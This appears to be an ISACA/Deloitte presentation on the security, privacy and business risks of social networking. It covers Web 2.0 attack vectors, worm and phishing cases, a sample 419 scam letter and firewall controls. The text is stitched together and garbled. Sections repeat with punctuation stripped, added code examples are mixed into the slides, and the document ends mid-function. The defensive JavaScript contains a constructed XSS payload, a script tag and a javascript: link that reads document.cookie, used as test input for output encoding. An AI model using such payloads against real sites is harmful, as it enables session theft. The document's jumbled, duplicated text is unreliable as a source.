bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
wwwisacaorg42
Risks and challenges (cont)Risks and challenges (cont)
bull Reputation mdash Damage to company brandreputation through inappropriate comments or remarks from employeesndash Even a lack of a response may damage the brand For example XYZ Company Inc
creates a Twitter account call XYZ_Cares and then fails to use the accountndash Other examples include creating social media program but not telling the rest of the
company about it so they may be unaware of any promotions or offers being publicized
bull Copyright violation mdash Third-party material such as essays articles and photographs are used without written consent from the proprietor
bull Intellectual Property theft mdash Harder to prevent inadvertent data leakage through the one-to-many nature of Web 20 as a medium
wwwisacaorg43
Risks and challenges (cont)Risks and challenges (cont)
bull Failures in the use of Social Media mdash most companies that use Social Media donrsquot approach it the way they would with other mission critical technologyndash At best it can be said that most companies today are merely dabbling with Social
Mediahellipndash Few have approached the solution with an integrated strategy or a concrete business
case usually because they either arenrsquot fully convinced of its value or have been slowed by the security and legal issues
ndash Without a strategy and proper metrics based on a business case their projects will remain small mismanaged and likely to fail
ldquoFully half of all Social Media investments will failrdquomdash Gartner
wwwisacaorg44
Risks and challenges (cont)Risks and challenges (cont)ldquoWhen I discovered YouTube I didnt work for five days I did nothing I viewed cookie monster sings chocolate rain about 1000 timesrdquo- Michael Scott from The Office
bull Productivity mdash Users employ social media tools for nonproductive purposes such as socializing (ldquoSocial Notworkingrdquo)
httpnewsbbccouk2hibusiness8325865stm
wwwisacaorg45
Risks and challenges (cont)Risks and challenges (cont)
bull Technical Integration mdash Most organizations note that integration between individual Web 20 applications and their overall infrastructure is a major concern
ndash Sign in using your account withbull Facebook AOLbull Twitter Bloggerbull Myspace WordPressbull Yahoo Netlogbull Google OpenIDbull Windows Live ID flickr
wwwisacaorg46
Risks and challenges (cont)Risks and challenges (cont)
bull Information hoarding mdash In many industries value is placed on what an employee knows that others do not know This belief prevents data sharing
bull Quantification mdash Researchers currently face challenges quantifying social networking benefitsndash Valuation techniques include among others Beckstromrsquos law which states that mdash ldquoThe
value of a network equals the net value of each userrsquos transactions conducted through that network valued from the perspective of each user and summed for allrdquo
Or alternatively
ndash httpenwikipediaorgwikiBeckstromrsquos_law
wwwisacaorg47
Risks and challenges (cont)Risks and challenges (cont)
bull Litigation issues mdash Discrimination defamation violation of privacy and harassment are some of the potential concerns that might result in litigation issues
wwwisacaorg48
A quick word on privacyA quick word on privacy
ldquoPeople have really gotten comfortable not only sharing more information and different kinds but more openly and with more people That social norm is just something that has evolved over timerdquo
mdash Mark Zuckerberg Facebook founder
ldquoIf you have something that you donrsquot want anyone to know maybe you shouldnrsquot be doing it in the first placerdquo
mdash Eric Schmidt CEO Google Inc
wwwisacaorg49
A quick word on privacy (cont)A quick word on privacy (cont)
bull Loss of Fourth Amendment protectionbull Encryption of data storage unlikelybull Lack of encryption while data in usebull Data remanence limited attempt to address
wwwisacaorg50
Responding to the risks and challengesResponding to the risks and challenges
bull Policies and proceduresndash Acceptable use policy
bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
www.isaca.org 36

Risks and challenges (cont.)

• New security concerns and attack vectors: Web services now drive the server-side core components, while Asynchronous JavaScript and XML (AJAX) and Rich Internet Application (RIA) clients enrich the interface inside the browser itself; both shifts change what can be attacked at each end
• Top 10 Web 2.0 attack vectors (http://net-square.com/whitepapers/Top10_Web20_AV.pdf):
  – Cross-site scripting (XSS) in AJAX, e.g. the Samy worm that exploited an XSS flaw in MySpace.com
  – XML poisoning: poisoned XML blocks sent from the AJAX client to the server-side parser
  – Malicious AJAX code execution: the browser replays the session cookies with every AJAX request, so injected script runs with the victim's identity
  – RSS/Atom injection: JavaScript injected into feed entries executes in the client browser that renders the feed
  – Web Services Description Language (WSDL) scanning and enumeration of the exposed methods
  – Client-side validation in AJAX routines with no matching server-side checks
  – Web services routing issues: compromise of intermediate nodes
  – Parameter manipulation with SOAP: web services consume variables straight from the SOAP body
  – XPath injection in SOAP messages to bypass authentication mechanisms
  – RIA thick-client binary manipulation, e.g. session-management logic that lives in the client
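As an added example (not code from the deck, from MySpace or from the net-square paper), the JavaScript below puts two of the vectors above side by side: an AJAX response handler that drops untrusted JSON fields straight into markup, the hardened renderer that encodes for the HTML text and attribute context and rejects non-http(s) link targets, and the server-side re-validation that the "client-side validation only" vector calls for. The profile object, its field names and the length limits are constructed for illustration; the `java\nscript:` split mirrors the whitespace trick the Samy worm used against MySpace's keyword filter.

```javascript
// Added example: output encoding for AJAX-rendered content, vulnerable vs hardened.
// The profile data and limits are constructed test data, not real MySpace content.

// Escape the five characters that let text break out of an HTML text node or a
// double-quoted attribute value.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Only allow http(s) link targets. Whitespace and control characters are removed
// before the check because browsers strip them inside a scheme, which is what
// made "java\nscript:" slip past a keyword filter.
function safeUrl(u) {
  const collapsed = String(u).replace(/[\s\u0000-\u001f]/g, '').toLowerCase();
  return /^https?:\/\//.test(collapsed) ? String(u) : '#';
}

// Vulnerable: untrusted JSON fields interpolated into markup as-is
// (the classic el.innerHTML = '...' + profile.about + '...').
function renderProfileVulnerable(profile) {
  return `<div class="about">${profile.about}</div>` +
         `<a href="${profile.homepage}">${profile.name}</a>`;
}

// Hardened: every value is encoded for the context it lands in, and the link
// target is checked before it is encoded as an attribute.
function renderProfileSafe(profile) {
  return `<div class="about">${escapeHtml(profile.about)}</div>` +
         `<a href="${escapeHtml(safeUrl(profile.homepage))}">${escapeHtml(profile.name)}</a>`;
}

// The "client-side validation only" vector: whatever the page's JavaScript checks,
// the server must check again, because the AJAX endpoint can be called directly
// with any payload. The limits here are assumed for the example.
function validateProfileServerSide(profile) {
  const errors = [];
  if (typeof profile.name !== 'string' || !/^[A-Za-z0-9_]{1,32}$/.test(profile.name)) errors.push('name');
  if (typeof profile.about !== 'string' || profile.about.length > 2000) errors.push('about');
  if (typeof profile.homepage !== 'string' || safeUrl(profile.homepage) === '#') errors.push('homepage');
  return errors;
}

// Constructed attacker profile: script in a free-text field plus a javascript:
// URL split by a newline.
const attackerProfile = {
  name: 'samy',
  about: '<script>document.body.innerHTML+="samy is my hero"</script>',
  homepage: 'java\nscript:alert(document.cookie)',
};

console.log(renderProfileVulnerable(attackerProfile));
console.log(renderProfileSafe(attackerProfile));
console.log('server-side validation errors:', validateProfileServerSide(attackerProfile));
```

The vulnerable renderer emits the script tag and the javascript: link unchanged; the hardened one emits only inert text and an empty link, and the server-side check rejects the homepage field regardless of what the client-side code allowed.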
Risks and challenges (cont.)

• Example worms and phishing attacks affecting social networking sites
  – Koobface: targets Facebook, MySpace, hi5, Bebo, Twitter and other sites. Users are prompted to click on a URL purporting to be an update from Adobe, and a worm is downloaded to the PC which then looks for personal data
  – Fbaction: Facebook phishing attack that encourages users to sign up for fbaction.net using their Facebook credentials. Those credentials are then used to hijack the Facebook account
Risks and challenges (cont.)

  – Boface: convinces users to click on a link pointing to a video, resulting in a download. Shortly after the download completes, the user's Facebook account is hijacked and used to spam (and propagate the worm to) all of their friends
• Common element: they all take advantage of the implied trust that social networking users have in each other
Risks and challenges (cont.)

"Has what we've learned about writing software the last 20 years been expressed in the design of Web 2.0? Of course not. It can't even be said to have a design. If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming, Web 2.0 would not be happening." – Marcus Ranum in InfoSec Magazine, May 2008

• Trust: data reliability is a common problem for social media in the workplace. The Web has partially solved this for search with techniques such as inbound-link counting; reputation and voting systems for social media are only starting to appear, often as plug-ins for social media tools
• Attacks may also take advantage of URL shortening services (bit.ly, tr.im, tinyurl.com, etc.), which hide the real destination of a link until it is clicked
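One practical check for the URL-shortening problem, added here as an example rather than taken from the deck: expand a shortened link by following only its redirect headers, so the real destination is known before anyone clicks it, and flag destinations whose hostname imitates a social networking brand. The redirect table, the `fakeHead` function that stands in for a real HEAD request, the `.example` hostnames and the brand list are all constructed for this illustration.

```javascript
// Added example: resolve a short link's redirect chain without fetching any page
// body or running any script, then check the landing host for brand look-alikes.

// Constructed HEAD responses: url -> {status, location}. A production version of
// head() would send a real HEAD request and return only the status and Location.
const constructedRedirects = {
  'http://bit.ly/abc123': { status: 301, location: 'http://tinyurl.com/xyz789' },
  'http://tinyurl.com/xyz789': { status: 302, location: 'http://faceb00k-login.example/secure' },
  'http://faceb00k-login.example/secure': { status: 200 },
  'http://tr.im/loop1': { status: 301, location: 'http://tr.im/loop2' },
  'http://tr.im/loop2': { status: 301, location: 'http://tr.im/loop1' },
};
function fakeHead(url) {
  return constructedRedirects[url] || { status: 404 };
}

// Follows Location headers for at most maxHops and returns the whole chain.
// Stops on a non-redirect status, a missing Location, a loop, or the hop limit.
function expandShortUrl(url, head = fakeHead, maxHops = 5) {
  const chain = [url];
  let current = url;
  for (let hop = 0; hop < maxHops; hop++) {
    const r = head(current);
    if (r.status < 300 || r.status >= 400 || !r.location) {
      return { final: current, chain, status: r.status, reason: 'landed' };
    }
    const next = new URL(r.location, current).toString(); // resolve relative Location
    if (chain.includes(next)) return { final: next, chain, status: r.status, reason: 'loop' };
    chain.push(next);
    current = next;
  }
  return { final: current, chain, status: null, reason: 'too-many-hops' };
}

// True when the landing hostname contains a brand name (after undoing the usual
// digit-for-letter substitutions) but is not that brand's own domain.
function looksLikeBrandSpoof(finalUrl, brands = ['facebook.com', 'twitter.com', 'myspace.com']) {
  const host = new URL(finalUrl).hostname.toLowerCase();
  const normalized = host.replace(/0/g, 'o').replace(/1/g, 'l').replace(/3/g, 'e');
  return brands.some((b) => {
    const brandWord = b.split('.')[0];
    return host !== b && !host.endsWith('.' + b) && normalized.includes(brandWord);
  });
}

const result = expandShortUrl('http://bit.ly/abc123');
console.log(result.chain.join(' -> '), '|', result.reason);
console.log('brand spoof:', looksLikeBrandSpoof(result.final));
```

The hop limit and loop check matter in practice: shortener chains are sometimes nested several deep, and an attacker can point two short links at each other to stall a naive resolver.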
Risks and challenges (cont.)

• More on phishing: social networks are a target-rich environment
Risks and challenges (cont.)

• More on phishing: social networks are a target-rich environment (cont.)

"Dearest One…
Sorry for the nature of this email, please bear with me.
I am Natasha Kone, a 22 year old lady now. I was born on the 1st of January 1986 to the family of Kone. My father's name is Kamara Cone. He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively. I am their only child. When I was a kid I attended a private school and things were well for me and my parents. Things changed when I was in High School; my mother died on the 21st October 1994. My father then took me very special and gave me motherly care. As fate had it, my father died last year…" – See http://www.419legal.org for more details

• The 419 scams have evolved with the technology: they now use LinkedIn to target specific individuals
Risks and challenges (cont.)

• Reputation: damage to company brand/reputation through inappropriate comments or remarks from employees
  – Even a lack of response may damage the brand. For example, XYZ Company Inc. creates a Twitter account called XYZ_Cares and then fails to use the account
  – Other examples include creating a social media program but not telling the rest of the company about it, so staff may be unaware of any promotions or offers being publicized
• Copyright violation: third-party material such as essays, articles and photographs is used without written consent from the owner
• Intellectual property theft: inadvertent data leakage is harder to prevent because of the one-to-many nature of Web 2.0 as a medium
Risks and challenges (cont.)

• Failures in the use of social media: most companies that use social media don't approach it the way they would any other mission-critical technology
  – At best, it can be said that most companies today are merely dabbling with social media…
  – Few have approached the solution with an integrated strategy or a concrete business case, usually because they either aren't fully convinced of its value or have been slowed by the security and legal issues
  – Without a strategy and proper metrics based on a business case, their projects will remain small, mismanaged and likely to fail

"Fully half of all social media investments will fail" – Gartner
Risks and challenges (cont.)

"When I discovered YouTube, I didn't work for five days. I did nothing. I viewed 'Cookie Monster sings Chocolate Rain' about 1,000 times." – Michael Scott, The Office

• Productivity: users employ social media tools for nonproductive purposes such as socializing ("social notworking")
  http://news.bbc.co.uk/2/hi/business/8325865.stm
Risks and challenges (cont.)

• Technical integration: most organizations note that integration between individual Web 2.0 applications and their overall infrastructure is a major concern
  – Federated sign-in ("Sign in using your account with…") offered by many sites: Facebook, Twitter, Myspace, Yahoo, Google, Windows Live ID, AOL, Blogger, WordPress, Netlog, OpenID, flickr
Risks and challenges (cont.)

• Information hoarding: in many industries, value is placed on what an employee knows that others do not know. This belief prevents data sharing
• Quantification: researchers currently face challenges quantifying social networking benefits
  – Valuation techniques include, among others, Beckstrom's law, which states that "The value of a network equals the net value of each user's transactions conducted through that network, valued from the perspective of each user and summed for all"
  – Or alternatively: http://en.wikipedia.org/wiki/Beckstrom's_law
Risks and challenges (cont.)

• Litigation issues: discrimination, defamation, violation of privacy and harassment are some of the potential concerns that might result in litigation
A quick word on privacy

"People have really gotten comfortable not only sharing more information and different kinds, but more openly and with more people. That social norm is just something that has evolved over time."
– Mark Zuckerberg, Facebook founder

"If you have something that you don't want anyone to know, maybe you shouldn't be doing it in the first place."
– Eric Schmidt, CEO, Google Inc.
A quick word on privacy (cont.)

• Loss of Fourth Amendment protection: data handed to a third-party provider generally does not carry the protection against search that the same data would have on your own premises
• Encryption of data in storage is unlikely
• Lack of encryption while data is in use
• Data remanence: only limited attempts are made to address it, so deleted content may persist in backups, caches and copies held by the provider or by other users
Responding to the risks and challenges

• Policies and procedures
  – Acceptable use policy
    • Details how social networking sites and applications can be used
    • Defines consequences for failure to comply, e.g. "termination of employment and legal action"
• Risk assessment
  – Establish what information is most critical to the business
  – Understand how information might become vulnerable and how to protect it (data mapping)
Responding to the risks and challenges

• Education and awareness
  – Inform users of the information security risks involved and how to guard against them
    • For example, only install or run applications from trusted sources approved by the corporate IT department
Responding to the risks and challenges (cont.)

• Vulnerability assessments
  – Identifying, quantifying and prioritizing the potential vulnerabilities that social networking may present to the organization
• Firewalls
  – Historically, firewalls focused on ports, IP addresses and packets
  – But social networking applications operate on ports 80 and 443, alongside all other web traffic, so port-based rules cannot tell them apart
  – Next-generation firewall technology offers granular control of social networking functionality:
    • Identify applications regardless of port, protocol, evasive tactic or SSL
    • Identify users regardless of IP address
    • Scan application content in real time
    • Visibility and policy control over application access
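To make "identify applications regardless of port, and users regardless of IP address" concrete, here is an added example (not vendor code and not from the deck) that classifies constructed connection-log lines by the TLS SNI / HTTP Host name rather than by port, ties each line to a user, and applies a read-allowed / post-restricted policy. The log format, the RFC 5737 test addresses, the domain signatures, the user-to-group table and the policy are all assumptions made for the illustration.

```javascript
// Added example: application- and user-aware policy over a constructed proxy/firewall
// log. Field layout (assumed): timestamp user src dst port sni method

// Every social networking flow below is on 443 or 80 (one on 8443), so the port
// says nothing; the SNI/Host name is what identifies the application.
const constructedLog = `
2010-03-02T09:01:12Z alice 192.0.2.3 198.51.100.11 443 www.facebook.com GET
2010-03-02T09:01:13Z alice 192.0.2.3 198.51.100.11 443 upload.facebook.com POST
2010-03-02T09:02:40Z bob 192.0.2.4 198.51.100.20 443 api.twitter.com POST
2010-03-02T09:03:05Z bob 192.0.2.4 198.51.100.20 8443 api.twitter.com POST
2010-03-02T09:04:51Z carol 192.0.2.5 198.51.100.30 443 mail.google.com GET
2010-03-02T09:05:00Z dave 192.0.2.6 198.51.100.40 80 www.myspace.com GET
`.trim().split('\n');

// Application signatures keyed on the hostname suffix, never on port or IP.
const appSignatures = [
  { app: 'facebook', suffixes: ['facebook.com', 'fbcdn.net'] },
  { app: 'twitter', suffixes: ['twitter.com', 'twimg.com'] },
  { app: 'myspace', suffixes: ['myspace.com'] },
];

function identifyApp(hostname) {
  const h = hostname.toLowerCase();
  const hit = appSignatures.find((s) => s.suffixes.some((d) => h === d || h.endsWith('.' + d)));
  return hit ? hit.app : 'other';
}

// Assumed directory lookup: which group each user belongs to. The policy is that
// everyone may read social sites, only marketing may post to them.
const userGroups = { alice: 'marketing', bob: 'engineering', carol: 'finance', dave: 'engineering' };
const WRITE_METHODS = new Set(['POST', 'PUT']);

function decide(entry) {
  const app = identifyApp(entry.sni);
  if (app === 'other') return 'allow';
  if (!WRITE_METHODS.has(entry.method)) return 'allow';   // reading is permitted
  return userGroups[entry.user] === 'marketing' ? 'allow' : 'block';
}

function parseLine(line) {
  const [ts, user, src, dst, port, sni, method] = line.trim().split(/\s+/);
  return { ts, user, src, dst, port: Number(port), sni, method };
}

// Runs the policy over the log and returns one decision per line for audit review.
function evaluateLog(lines = constructedLog) {
  return lines.map((l) => {
    const e = parseLine(l);
    return { user: e.user, app: identifyApp(e.sni), port: e.port, method: e.method, decision: decide(e) };
  });
}

for (const d of evaluateLog()) {
  console.log(`${d.user.padEnd(6)} ${d.app.padEnd(9)} port=${d.port} ${d.method.padEnd(4)} -> ${d.decision}`);
}
```

Bob's post to api.twitter.com is blocked on 443 and on 8443 alike, and Alice's upload is allowed because of who she is rather than which address she came from; that is the whole difference between the port/IP model and the application/user model the slide describes.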
What is next in the world of social networking
Where we are at today

• Enterprise social media has crossed the tipping point and is no longer considered an "emerging" technology
  "The Hype Cycle": http://en.wikipedia.org/wiki/Hype_cycle
What's next in the world of social networking

• Increase in the use of mobile devices to access social networks
  – Over 600 million people will use their phone to access social networks by 2013, more than four times the 2009 figure of 140 million (source: eMarketer)
• Increase in frequency of access
  – Facebook mobile users are 50% more active than other users of the site
• Take your social profile with you as you travel the Web
  – For example, Facebook Connect
• Social networks will become more pervasive, broadcasting your location in geo-networking apps
  – Interaction between devices. For example, your car's navigation system will be able to learn your friend's location and provide directions to them
Some further predictions

• Some quotes on social networks
  – "Probably the greatest transformative force in our generation, absent a major war." – Mark Zuckerberg, Facebook founder
  – "(Twitter is)… something important that has the potential to change the world, though we have a long way to go." – Biz Stone, co-founder of Twitter
Q&A

Today's Presenters

Nelson Gibbs
Senior Manager
AERS – Audit & Enterprise Risk Services
Deloitte & Touche LLP
ngibbs@deloitte.com
+1 213 593 4241
Appendix

• Additional resources
  – Gopal, Raj et al., "Web 2.0 reinvents corporate networking", Deloitte Consulting LLP (2008)
  – The Economist, "A special report on social networking", January 30, 2010
  – Fraser, Matthew and Dutta, Soumitra (2008), Throwing Sheep in the Boardroom: How Online Social Networking Will Transform Your Life, Work and World
  – "Great Wall of Facebook: The Social Network's Plan to Dominate the Internet, and Keep Google Out" by Fred Vogelstein, Wired Magazine (June 2009), http://www.wired.com/techbiz/it/magazine/17-07/ff_facebookwall
  – "The Future is Social, Not Search, Facebook COO Says" by Ryan Singel, Wired Magazine (October 2009), http://www.wired.com/epicenter/2009/10/facebook-social-2
  – British Computer Society Social Media Web site: http://www.bcs.org/socialmedia
This presentation contains general information only, and Deloitte is not, by means of this presentation, rendering accounting, business, financial, investment, legal, tax or other professional advice or services. This presentation is not a substitute for such professional advice or services, nor should it be used as a basis for any decision or action that may affect your business. Before making any decision or taking any action that may affect your business, you should consult a qualified professional advisor.
Deloitte, its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation.
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
www.isaca.org 39
Risks and challenges (cont)
“Has what we've learned about writing software the last 20 years been expressed in the design of Web 2.0? Of course not. It can't even be said to have a design. If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming, Web 2.0 would not be happening.” – Marcus Ranum, in InfoSec Magazine, May 2008
• Trust — Data reliability commonly causes issues for social media in the workplace. The Web has partially solved this with techniques such as inbound link counting, but reputation and voting systems are only now starting to appear, often as plug-ins for social media tools
• Phishers may also take advantage of URL shortening services (bit.ly, tr.im, tinyurl.com, etc.): the shortened link gives the reader no way to see the real destination before following it
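The defence a security team wants against the shortened-link problem above is to expand the link before anyone clicks it, following only the redirect headers and never fetching a page body. The resolver below is an added example written for this page, not code from the presentation or from any shortening service; the shortener host list, the hop limit and the redirect table are constructed for the demonstration, and the `fetch_head` parameter is an assumption that lets the caller plug in a real HTTP HEAD client (or, as here, an offline fake).

```python
"""Expand a shortened URL safely before anyone clicks it.

Added example, not from the original presentation. The shortener hosts and
the redirect chain below are constructed for the demonstration; `fetch_head`
is an injected function so the resolver never executes page content and can
run offline against a fake redirect table.
"""
from urllib.parse import urlsplit, urljoin

# Well-known shortener hosts (constructed list for the example).
SHORTENER_HOSTS = {"bit.ly", "tr.im", "tinyurl.com", "t.co", "goo.gl", "ow.ly"}

MAX_HOPS = 5  # a legitimate shortener needs one redirect; long chains are suspicious


def is_shortened(url: str) -> bool:
    """True if the link's host is a known URL-shortening service."""
    host = (urlsplit(url).hostname or "").lower()
    return host in SHORTENER_HOSTS


def expand(url: str, fetch_head, max_hops: int = MAX_HOPS) -> dict:
    """Follow 3xx Location headers without fetching any page body.

    fetch_head(url) -> (status_code, headers_dict) is supplied by the caller.
    Returns the final URL, the full hop chain and a list of warning strings.
    """
    chain = [url]
    warnings = []
    current = url
    for _ in range(max_hops):
        status, headers = fetch_head(current)
        location = headers.get("Location")
        if not (300 <= status < 400 and location):
            break
        nxt = urljoin(current, location)          # Location may be relative
        if urlsplit(nxt).scheme not in ("http", "https"):
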